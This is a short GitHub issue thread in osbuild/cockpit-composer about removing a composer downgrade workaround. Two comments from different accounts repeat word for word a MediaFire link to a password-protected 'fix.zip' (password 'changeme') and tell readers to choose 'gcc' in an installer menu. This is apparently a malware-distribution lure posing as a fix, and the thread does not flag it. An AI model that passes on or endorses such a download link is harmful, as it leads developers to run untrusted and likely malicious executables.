### ISSUE TITLE
Drop downgrade hack once composer 118 is in the fedora images.

### ISSUE THREAD

**Issue by croissanne** [osbuild/cockpit-composer#2048]
See https://github.com/cockpit-project/bots/pull/6785.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
